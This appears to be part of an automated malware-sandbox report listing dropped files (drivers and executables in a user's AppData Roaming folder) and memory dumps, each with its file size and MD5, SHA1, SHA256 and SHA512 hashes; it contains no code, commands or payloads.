fd6f56189cd723b32fc06392867fcd5128e63d8b5801e4f7a83523f820531981

SHA512
3ec96ba6fca7a4aa45becfef84b23b12c305f34045ac1a15b22745289e33b9326103e853bad698434df772a76515e7e8109fa8724d65f0351ee380c16d888c60

Download Submit
C:\Users\Admin\AppData\Roaming\UCOREW64.sys

Filesize
14KB

MD5
a17c58c0582ee560c72f60764ed63224

SHA1
bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825

SHA256
a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200

SHA512
a820a3280da690980a9297fe1e62356eba1983356c579d1c7ea8d6f64bc710b11b0a659c5d6b011690863065541f5627c4e3bc13c02087493de7e63d60981063

Download Submit
C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe

Filesize
31.9MB

MD5
a48537d35ede9fe4d15b0818870c6ff2

SHA1
e760863c4db17e55e72ba507ebb22a5b9396c304

SHA256
628a2b6ad14cb09e3432f369c7ac3f2d341c5c518bfb9af16ee77e1d62601deb

SHA512
c6556320d20a051cbfe08febbdf80ff3168b4a7654ce1d77bada1329d499497462cef1d978abfa95d064dac49eb14dc7e914d0b9391aec6546991d499f3aaf97

Download Submit
C:\Users\Admin\AppData\Roaming\amifldrv64.sys

Filesize
29KB

MD5
f22740ba54a400fd2be7690bb204aa08

SHA1
5812387783d61c6ab5702213bb968590a18065e3

SHA256
65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9

SHA512
ac1f89736cf348f634b526569b5783118a1a35324f9ce2f2804001e5a04751f8cc21d09bfa1c4803cd14a64152beba868f5ecf119f10fa3ccbe680d2fb481500

Download Submit
C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe

Filesize
103KB

MD5
59a7ce7a4d30e28e6bc356263693eb98

SHA1
a6ace03c0f719ce2e4f9839d0917778a5e798340

SHA256
baa7fb9cd0b15a926d8a34bc070c6cee839eb6bd2a7d4f133eed6b64a5607d8d

SHA512
8e6dac42e51945fc4bf8ab52a6642a548d7493796eda396ebd6dbe5e986f0ee46ae0e9f9d9fd714b020fda0c24f0265436278be62c1488097a777076a5e1c0c2

Download Submit
C:\Users\Admin\AppData\Roaming\ddc.exe

Filesize
377KB

MD5
97b963fd85ff4cc2a3b0da8164593cfc

SHA1
f29b0ba7cc01182f83845088375c2c18fd49f187

SHA256
af219747072341760396d686f2fe7350ec2dce713f1ec1977c21f8be7b9197d5

SHA512
232bcfb83387ed125f3c3a065031e36e3f7c494118aa2fa33c64fd3d81066531ad9de09c5358f5b0a24024b0a223a2fc4a5646e9b475853904b24729df808fae

Download Submit
C:\Users\Admin\AppData\Roaming\devcon.exe

Filesize
80KB

MD5
d153a0bc6f0476457b56fc38795dea01

SHA1
eb3c25afab996b84c52619c6f676d0663c241e01

SHA256
df048df347a738b6addec6f3fd65c73e371d0e11e2dc02f88f8ef307b964e1b7

SHA512
6322d98b356cfa9a4bc8559959de01cdd4d9c038a9d0d506d2211d9e329c6b938f5bccb5459217a4c471cf200287bdbf7068393ce6f69b37a103e5ae6e758414

Download Submit
C:\Users\Admin\AppData\Roaming\moreCLEANhardware.exe

Filesize
267KB

MD5
565825f715521b9dcccab692f1191414

SHA1
ff3eb2f1fffbd9e82132a893166b05b1db64064d

SHA256
0354388341d5f97f0ab8ed5bbef1d0ff14a233770619dd33b09cfa5f52bffe85

SHA512
888aac72349aa265d397e132e53fffcbb4632c975c8b5bb896d8a4b1ebf4e2d09bdf1b3df12407c273e0e2023bc7950ad5b49ceb27592f9c0c325214af8dd033

Download Submit
C:\Users\Admin\AppData\Roaming\reset2-Hardware Rescan after Adapter reset.exe

Filesize
88KB

MD5
d144852c9d62d6e8d2e3ed532c853aac

SHA1
ea52d984ff2be5fa377a21b0af425f778e60fa77

SHA256
996d44d2331f60e8c158662200fcd1f5cfc60076503e940ce9db98e0e92adfe6

SHA512
af68d189a4480c5c54e256f6e39ef5fb9e35fa78dee4163d0805a6d406183f50cef725ed7bc677c46f8030523353a16e71aa90a388a1235a2b0dc86352cd9af7

Download Submit
C:\Users\Admin\AppData\Roaming\reset_adapters.exe

Filesize
335KB

MD5
bd624e99155ffa5868f39c73a1513cee

SHA1
0a6c46d21faefaf29c992193e5dac6b4b4a58719

SHA256
4f67490d6a7d952599180f26d167b74c70d4f840d36e73bb8ec7ffb29b6a6df8

SHA512
46471f61f44f97d63993349ed005b26d0a415b4082c1a48321aba18e58d3e10415f24d18ece3016cf65967a29ca85b8d935f70e06fd5ef96cb046d7074d9368c

Download Submit
memory/1416-241-0x00000000006B0000-0x00000000006D0000-memory.dmp

Filesize
128KB

Download
memory/3900-237-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download